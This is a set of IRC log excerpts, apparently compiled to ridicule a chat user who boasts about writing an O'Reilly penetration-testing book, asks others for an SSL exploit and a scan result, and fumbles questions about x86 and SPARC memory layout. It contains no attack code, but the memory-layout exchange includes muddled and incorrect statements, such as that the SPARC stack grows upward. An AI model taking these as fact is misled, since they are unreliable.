[15:44:08] <so1o> who the fuck are these ppl
[15:44:11] <so1o> they look like students
[15:44:16] <so1o> fucking teenage students

[15:46:06] <so1o> anyhow
[15:46:12] <so1o> who are those dropkickz

[15:46:35] <flame> one of them coded a sploit for ssl :| apartently works
[15:46:37] <so1o> webcamTASTIC
[15:46:48] <so1o> wrd
[15:46:52] <so1o> i dont see no working expl
[15:46:55] <so1o> maybe someone can hook me up

[11:02:59] <so1o> i'm writing a book for oreilly
[11:03:02] <so1o> if thatz what u mean
[11:03:20] <lewney> about security?
[11:03:27] <so1o> 'network security assessment'

[11:13:09] <so1o> my book is going to fuck the industry up
[11:13:15] <so1o> everything will be owned
[11:13:29] <so1o> the follow-up book will be the killer tho
[11:13:33] <so1o> about internal network security
[11:13:45] <so1o> and what u can do if you have access to the wire n shit
[11:13:56] <so1o> that wont be an oreilly book
[11:14:02] <so1o> im going to release that anonymously
[11:14:12] <so1o> through some publisher like no starch books or something

[13:51:42] <so1o> just mention the whole o'reilly book thing
[13:51:49] <so1o> and the fact that i will lock them down
[13:51:54] <so1o> like nobody ever has
[13:51:58] <so1o> i will rock them

[16:31:09] <so1o> it'll be out in january bro
[16:31:25] <so1o> the first 7 chapters (half the book) has been copy edited
and is ready to print
[16:31:37] <giles_> i thought you were pushing for NOV
[16:31:42] <giles_> as a relesase date
[16:31:44] <so1o> um


[16:43:36] <so1o> man i fucking hate oracle
[16:43:43] <so1o> i hate proprietary shit
[16:43:44] <so1o> :/
[16:43:59] <so1o> im writing about hacking the tns listener
[16:44:02] <so1o> for my oreilly book
[16:44:14] <so1o> and the more i research oracle
[16:44:18] <so1o> the more complex it becomes

[13:11:54] <so1o> my book will    fuck shit upo
[13:11:56] <so1o> !!!!111
[13:11:59] <so1o> df did u kno
[13:12:02] <so1o> i am writing a book for oreilly
[13:12:04] <so1o> about hacking

[15:25:34] <so1o> my book is too darkside
[15:25:36] <so1o> to pdf

[13:14:56] <so1o> yeah i kno
[13:15:03] <so1o> dont want to make the book a big howto tho

[13:16:40] <so1o> i'll just put it in the 2nd edition due out in 2005

[13:18:45] <akriel> so1o, you wrote a book?
[13:18:48] <so1o> yeah for oreilly
[13:18:51] <giles> yo
[13:18:51] <so1o> on pentesting
[13:18:58] <akriel> so1o, what was title?
[13:19:10] <so1o> network security assessment
[13:19:12] <so1o> out in january 2004
[13:19:21] <akriel> you wrote the whole thing?
[13:19:31] <so1o> yeah

[12:11:53] <so1o> anyone got access to a solaris 9 box and nmap 3.45 or 3.48
[12:11:59] <so1o> i need an rpc scan result
[12:12:04] <so1o> to put in teh book

[15:26:29] <so1o> one day my book will be finished
[15:26:31] <so1o> and it will be good
[15:26:33] <so1o> until then
[15:26:34] <so1o> itz not

[15:33:01] <so1o> one day i might work at idefense
[15:33:05] <so1o> if they pay me

[15:47:23] <so1o> mine are hardcore tho
[15:47:36] <so1o> john mcdonald, ben laurie, jeff fay
[15:47:40] <so1o> and i tried to get david litchfield
[15:47:44] <so1o> but he didnt return emailz

Watch out for these advanced topics, coming in the sequel!

[11:50:11] <so1o> if i am talking about memory layout in intel x86
[11:50:12] <so1o> it goes..
[11:50:19] <so1o> text
[11:50:19] <so1o> data
[11:50:21] <so1o> bss
[11:50:22] <so1o> heap
[11:50:29] <so1o> stack
[11:50:40] <so1o> 0xffffffff
[11:50:41] <so1o> right
[11:50:52] <so1o> i mean its sparc which has the heap and stack upside down
[11:51:34] <lewney> [text][data][<-- stack]
[11:51:40] <lewney> [data] [ bss ][ heap -->]
[11:51:43] <lewney> thats the layout
[11:51:44] <lewney> :)
[11:52:32] <so1o> hm
[11:52:35] <so1o> now you've confused me
[11:52:49] <so1o> i thought it was
[11:52:52] <so1o> 0x00000000
[11:52:53] <so1o> text
[11:52:54] <so1o> data
[11:52:55] <so1o> bss
[11:52:56] <so1o> heap
[11:52:57] <so1o> stack
[11:52:59] <so1o> 0xffffffff
[11:53:11] <so1o> and the heap/stack grow down/up accordingly
[11:53:32] <so1o> so you're saying its..
[11:53:39] <so1o> text
[11:53:39] <so1o> data
[11:53:40] <so1o> stack
[11:53:41] <so1o> data
[11:53:42] <so1o> bss
[11:53:43] <so1o> heap
[11:53:44] <so1o> ?
[11:54:17] <lewney> yeah at least I think it is :)
[11:54:29] <so1o> crazy bread
[11:54:47] <so1o> the diagram i got says runtime memory organization is
text, data,bss, heap, stack
[11:54:48] <so1o> :/
[11:54:55] <so1o> where did br00t ho
[11:54:56] <so1o> go
[11:55:23] <lewney> ill ask esdee
[11:55:28] <so1o> ok
[11:56:25] <lewney> nah its the first datagram
[11:56:26] <lewney> you were right
[11:57:12] <so1o> coo
[11:57:14] <so1o> where is esdee
[11:57:40] <lewney> msn
[11:57:40] <lewney> :P
[11:58:13] <so1o> i8
[11:58:35] <lewney> but the first one was right
[12:02:43] <so1o> ok
[12:02:57] <so1o> ask esdee which architectures turn heap and stack up the
other way
[12:03:02] <so1o> i think its only sparc
[12:05:49] <lewney> he says that on Solaris the heap gets mapped at a 0x4000
[12:06:02] <lewney> and the stack on an address like  0xfffe0000
[12:06:29] <so1o> heh crazy
[12:06:39] <so1o> which way do they grow though
[12:06:53] <so1o> does sparc stack grow from 0xffffe0000 down to 0xffffffff
[12:06:55] <so1o> or up
[12:07:03] <so1o> and same with heap
[12:11:31] <lewney> I've asked him
[12:11:57] <lewney> hmm so1o
[12:12:10] <lewney> it grows up
[12:12:39] <lewney> it being the stack
[12:12:44] <lewney> I have to be afk now
[12:12:49] <lewney> gonna buy diablo
[12:12:51] <lewney> bbiab
[12:15:24] <so1o> hm
[12:15:31] <so1o> maybe its the heap that grows the other way
[12:15:37] <so1o> i just remember horizon talking ages ago
[12:15:46] <so1o> about how sparc fucks with his head sometimes

Please email me if you find out the answer to this one!

[12:36:19] <so1o> when talking about text and bss segment
[12:36:20] <so1o> s
[12:36:27] <so1o> what does bss stand for?

|=[ EOF ]=---------------------------------------------------------------=|
  • 1
  • 1
    觉得还不错? 一键收藏
  • 0


  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助




当前余额3.43前往充值 >
领取后你会自动成为博主和红包主的粉丝 规则
钱包余额 0